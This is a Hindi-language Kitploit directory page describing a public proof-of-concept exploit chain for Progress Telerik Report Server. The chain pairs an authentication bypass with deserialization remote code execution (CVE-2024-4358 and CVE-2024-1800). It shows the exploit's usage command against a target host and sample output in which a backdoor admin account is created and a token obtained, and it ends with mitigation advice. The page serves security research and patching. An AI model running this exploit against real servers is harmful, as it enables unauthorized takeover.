Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-4358 — Progress Telerik Report Server पूर्व-प्रमाणित RCE श्रृंखला (CVE-2024-4358/CVE-2024-1800) | Kitploit
उपकरण/GitHubGitHub/sinsinology/cve-2024-4358
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणपेलोड डेवलपमेंट
GitHubsinsinology/cve-2024-4358

CVE-2024-4358

Progress Telerik Report Server पूर्व-प्रमाणित RCE श्रृंखला (CVE-2024-4358/CVE-2024-1800)

रिपॉजिटरी देखें
79152 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-4358 / CVE-2024-1800

CVE-2024-4358/CVE-2024-1800 के लिए Telerik Report Server डी-सीरियलाइजेशन और प्रमाणीकरण बायपास एक्सप्लॉइट श्रृंखला

तकनीकी विश्लेषण

भेद्यता का मूल कारण विश्लेषण मेरे ब्लॉग पर पाया जा सकता है poc

सारांश

समर्थित संस्करण?

मूलतः वे सभी जो एक्सप्लॉइट प्रकाशित होने के समय मौजूद थे, भविष्य के संदर्भ के लिए, नीचे दी गई सूची में हर प्रमुख/लघु संस्करण:

root@kitploit:~
2012
2017
2018
2019
2020
2021
2022
2023
2024

उपयोग

root@kitploit:~
python CVE-2024-4358.py --target http://192.168.253.128:83 -c "whoami"

(^_^) Progress Telerik Report Server pre-authenticated RCE (CVE-2024-4358/CVE-2024-1800) || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) random backdoor username: oelycslyun
(*) random backdoor password: cqgnacxljo
(*) Attempting to bypass authentication
(+) Authentication bypass was successful, backdoor account created
(+) Saving credentials to credentials.txt
(+) Successfully authenticated as oelycslyun with password cqgnacxljo
(*) got token: zfCch_LNv0PyKfe7eBDYKXV70IOotwNQ2p82aX-JHIMCisVnTW9PWWYUKljhcRw5alubNOg_gXoHT6-hJk4VO-jGZuzmisLIi5A
(*) Generated random report name: qvwdycugmc
(*) Creating malicious report under name qvwdycugmc
(*) Deserialization exploit finished

शमन उपाय

नवीनतम संस्करण में अपडेट करें या Progress Advisory के निर्देशों का पालन करके शमन करें

  • https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358

नवीनतम सुरक्षा अनुसंधान के लिए हमें Twitter पर फॉलो करें:

  • SinSinology
  • SummoningTeam

अस्वीकरण

यह सॉफ़्टवेयर पूरी तरह से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और स्पष्ट रूप से अधिकृत किए जाने के अलावा सिस्टम पर हमला करने के लिए इसका उपयोग करने का इरादा नहीं है। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए ज़िम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें